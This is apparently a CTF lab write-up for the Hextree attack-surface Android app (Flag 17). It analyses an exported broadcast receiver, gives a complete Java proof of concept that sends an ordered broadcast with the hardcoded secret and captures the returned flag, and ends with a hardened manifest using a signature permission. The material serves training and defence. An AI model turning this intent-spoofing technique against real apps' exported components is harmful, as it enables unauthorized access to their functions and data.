Static Analysis
AndroidManifest.xml
Inspecting Flag17Receiver in the AndroidManifest.xml file, we see the following:

<receiver
    android:name="io.hextree.attacksurface.receivers.Flag17Receiver"
    android:enabled="true"
    android:exported="true"/>

A normal receiver, nothing interesting beyond the fact that it is exported with no permission attribute, so any app on the device can send it a broadcast. Let’s inspect the Flag17Receiver class.
Flag17Receiver Class
public class Flag17Receiver extends BroadcastReceiver {
    public static String FlagSecret = "give-flag-17";

    @Override // android.content.BroadcastReceiver
    public void onReceive(Context context, Intent intent) {
        Log.i("Flag17Receiver.onReceive", Utils.dumpIntent(context, intent));
        if (isOrderedBroadcast()) {
            if (intent.getStringExtra("flag").equals(FlagSecret)) {
                success(context, FlagSecret);
                return;
            }
            Bundle bundle = new Bundle();
            bundle.putBoolean("success", false);
            setResult(0, "Flag 17 Completed", bundle);
        }
    }

    private void success(Context context, String str) {
        Flag17Activity flag17Activity = new Flag17Activity();
        flag17Activity.f = new LogHelper(context);
        flag17Activity.f.addTag(str);
        flag17Activity.success(null, context);
        Bundle bundle = new Bundle();
        bundle.putBoolean("success", true);
        bundle.putString("flag", flag17Activity.f.appendLog(flag17Activity.flag));
        setResult(-1, "Flag 17 Completed", bundle);
    }
}

As we can see, we only need to send the flag extra with the correct value, just like in the Flag16 challenge. The only difference here is that the receiver requires an ordered broadcast (isOrderedBroadcast()) and also sends the flag back in the result, so let’s create the POC for it!
Creating POC
Flag17.java
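import android.content.BroadcastReceiver;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import android.widget.Button;
import androidx.appcompat.app.AppCompatActivity;

public class Flag17 extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_flag17);
        getSupportActionBar().setTitle("Flag 17");

        // Define the receiver to handle the result of the ordered broadcast.
        // It runs last in the chain and sees whatever Flag17Receiver passed to setResult().
        BroadcastReceiver resultReceiver = new BroadcastReceiver() {
            @Override
            public void onReceive(Context context, Intent intent) {
                // true = return an empty Bundle instead of null when no extras were set
                Bundle extras = getResultExtras(true);
                String flag = extras.getString("flag");
                Log.i("Tensai-POC", "Flag 17 Result: " + flag);
            }
        };

        Button button = findViewById(R.id.button_flag17);
        button.setOnClickListener(v -> {
            Log.v("Tensai-POC", "Solving Flag 17");
            Intent intent = new Intent();
            // Extra checked by Flag17Receiver against FlagSecret
            intent.putExtra("flag", "give-flag-17");
            // Explicit intent targeting the exported receiver
            intent.setComponent(new ComponentName(
                    "io.hextree.attacksurface",
                    "io.hextree.attacksurface.receivers.Flag17Receiver"
            ));
            // Send ordered broadcast to get the flag back in resultReceiver
            sendOrderedBroadcast(intent, null, resultReceiver, null, RESULT_CANCELED, null, null);
        });
    }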
}

Here we created a POC that sends the intent with the correct secret, and we implemented the onReceive method of our result receiver to catch the flag from the result. Here are our logs in logcat:

Flag
HXT{returned-result-ds82s}
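
On the defensive side, the receiver is reachable because it is exported without a permission, and the FlagSecret string is readable by anyone who decompiles the APK, so it does not authenticate the sender. The manifest below is an added example (not from the original write-up or the app) that restricts the declaration shown above with a signature-level permission; the permission name is an assumption made for illustration.

```xml
<!-- Added example: hardened manifest for the receiver discussed above. -->
<!-- The permission name SEND_FLAG17 is hypothetical and not taken from the app. -->
<manifest xmlns:android="http://schemas.android.com/apk/res/android">

    <!-- Signature protection level: the system grants this permission only to
         apps signed with the same certificate as the app that declares it. -->
    <permission
        android:name="io.hextree.attacksurface.permission.SEND_FLAG17"
        android:protectionLevel="signature" />

    <application>

        <!-- Weak form shown on the page, kept here for comparison only:
             android:exported="true" with no android:permission attribute,
             so any installed app can deliver an intent to onReceive(). -->

        <!-- Hardened form: still exported, but a sender must hold the
             signature permission or the system drops the broadcast
             before Flag17Receiver.onReceive() is ever called. -->
        <receiver
            android:name="io.hextree.attacksurface.receivers.Flag17Receiver"
            android:enabled="true"
            android:exported="true"
            android:permission="io.hextree.attacksurface.permission.SEND_FLAG17" />

    </application>
</manifest>
```

If the receiver never needs broadcasts from other apps, setting android:exported="false" is the simpler fix and removes the external entry point entirely.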